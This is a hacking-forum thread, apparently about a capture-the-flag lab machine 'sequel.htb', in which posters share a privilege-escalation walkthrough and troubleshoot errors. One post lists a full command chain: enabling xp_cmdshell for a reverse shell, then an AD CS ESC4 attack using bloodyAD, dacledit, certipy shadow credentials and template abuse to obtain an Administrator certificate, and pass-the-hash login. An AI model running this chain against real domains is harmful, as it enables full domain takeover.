[akorshikai]

bloodyAD is a Windows or a Linux app?

Linux. You can find the repo here: https://github.com/CravateRouge/bloodyAD.git

[Art10n]

bloodyAD is a Windows or a Linux app?

Linux. You can find the repo here: https://github.com/CravateRouge/bloodyAD.git

In this links there only a .exe (for Windows). I can rewrite my question: 

In Linux, can I do de same that can do bloodyAD ?

[BanMeAgainPussies]

Season 7 is finally here.

Thanks all of you!!!

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[drixpeo]

bloodyAD is a Windows or a Linux app?

Linux. You can find the repo here: https://github.com/CravateRouge/bloodyAD.git

In this links there only a .exe (for Windows). I can rewrite my question: 

In Linux, can I do de same that can do bloodyAD ?

Check the wiki, you can install it using pip or by cloning the repository with git.

[KochiyaS]

mssqlclient.py -p 1433 'sa'@dc01.sequel.htb -dc-ip {ip} (login with password found in unpacked excel spreadsheet found in smb share as rosa)
enable_xp_cmdshell
execute powershell #3 base64 reverse shell with your xpcmdshell
find ryan password in sql ini file on the box as sql_svc
login as ryan to get user txt
ingest with bloodhound to find you have write all on the ca svc that can do esc4 attack as ryan

exploitation:
bloodyAD --host dc01.sequel.htb -d sequel.htb -u ryan -p {ryan_pass} set owner ca_svc ryan
dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'{ryan_pass}'
certipy-ad shadow auto -u ryan@sequel.htb -p '{ryan_pass} -dc-ip {ip} -ns {ip} -target dc01.sequel.htb -account ca_svc
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip {ip} -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip {ip}
certipy-ad req -u ca_svc -hashes :{ca_svc_hash} -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip {ip} -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns {ip} -dns {ip}
certipy-ad auth -pfx ./administrator.pfx -dc-ip {ip}
evilwinrm -i dc01.sequel.htb -i administrator -H {admin_hash}

note: if you get some dumb shit DNS error it's because the automation reverted the template, so you need to redo the steps

When running: 
certipy-ad auth -pfx ./administrator.pfx -dc-ip {ip}  --> Got the following error:
└─$ ./certipy auth -pfx ./administrator_dc01.pfx -dc-ip x.x.x.x
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[-] Got error: [Errno 2] No such file or directory: './administrator_dc01.pfx'
[-] Use -debug to print a stacktrace

certipy-ad req -u ca_svc -hashes :{ca_svc_hash} -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip {ip} -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns {ip} -dns {ip}

this command will generate your admin pfx that you use for auth. it will show you the path as well, so just substitute the path. you are getting that error because it isnt in your pwd

[Dispute22311]

How do you get to this conclusion for root? When I run Bloodhound I get it telling me to just do a DCSync attack when marking Ryan as owned and using shortest path to Domain Admins. Thanks!

[KochiyaS]

How do you get to this conclusion for root? When I run Bloodhound I get it telling me to just do a DCSync attack when marking Ryan as owned and using shortest path to Domain Admins. Thanks!

Are you using the old bloodhound which comes with Kali? It is deprecated, using Bloodhound Community edition supports ADCS which will show you the attack route for the cert template. Old bloodhound will not show you ADCS.
You will also have to use a compatible remote ingestor, using an ingestor like nxc, bloodhound-python, or bloodhound.py will not ingest the CA info. You can use rusthound-ce as it supports BHCE.

[Aloha_SnackBar]

Hey all, I've managed to get foothold and user flag, but I'm stuck in the privesc part using the certipy-ad,

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Targeting user 'ca_svc'
[*]Generating certificate
[*]Certificate generated
[*]Generating Key Credential
[*]Key Credential generated with DeviceID '6ea78542-00b7-1ec4-54d0-7c757188d0e5'
[*]Adding Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*]Successfully added Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*]Authenticating as 'ca_svc' with the certificate
[*]Using principal: ca_svc@sequel.htb
[*]Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*]Restoring the old Key Credentials for 'ca_svc'
[*]Successfully restored the old Key Credentials for 'ca_svc'
[*]NT hash for 'ca_svc': None

I'm pretty sure the NT hash is not supposed to be None

I don't know what the hell to do anymore.

A little nudge peeps. howpaws:

[akorshikai]

Hey all, I've managed to get foothold and user flag, but I'm stuck in the privesc part using the certipy-ad,

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Targeting user 'ca_svc'
[*]Generating certificate
[*]Certificate generated
[*]Generating Key Credential
[*]Key Credential generated with DeviceID '6ea78542-00b7-1ec4-54d0-7c757188d0e5'
[*]Adding Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*]Successfully added Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*]Authenticating as 'ca_svc' with the certificate
[*]Using principal: ca_svc@sequel.htb
[*]Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*]Restoring the old Key Credentials for 'ca_svc'
[*]Successfully restored the old Key Credentials for 'ca_svc'
[*]NT hash for 'ca_svc': None

I'm pretty sure the NT hash is not supposed to be None

I don't know what the hell to do anymore.

A little nudge peeps. howpaws:

[*]Can you paste the command you used? Judging by the error message, you likely have a clock skew error that can be corrected using faketime or rdate.

[KochiyaS]

Hey all, I've managed to get foothold and user flag, but I'm stuck in the privesc part using the certipy-ad,

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Targeting user 'ca_svc'
[*]Generating certificate
[*]Certificate generated
[*]Generating Key Credential
[*]Key Credential generated with DeviceID '6ea78542-00b7-1ec4-54d0-7c757188d0e5'
[*]Adding Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*]Successfully added Key Credential with device ID '6ea78542-00b7-1ec4-54d0-7c757188d0e5' to the Key Credentials for 'ca_svc'
[*]Authenticating as 'ca_svc' with the certificate
[*]Using principal: ca_svc@sequel.htb
[*]Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*]Restoring the old Key Credentials for 'ca_svc'
[*]Successfully restored the old Key Credentials for 'ca_svc'
[*]NT hash for 'ca_svc': None

I'm pretty sure the NT hash is not supposed to be None

I don't know what the hell to do anymore.

A little nudge peeps. howpaws:

kerb clock skew error, you need to sync ur time with the DC
[*]
sudo su
(in root term) timedatectl set-ntp off; ntpdate {dc_ip}
then when you are done timedatectl set-ntp on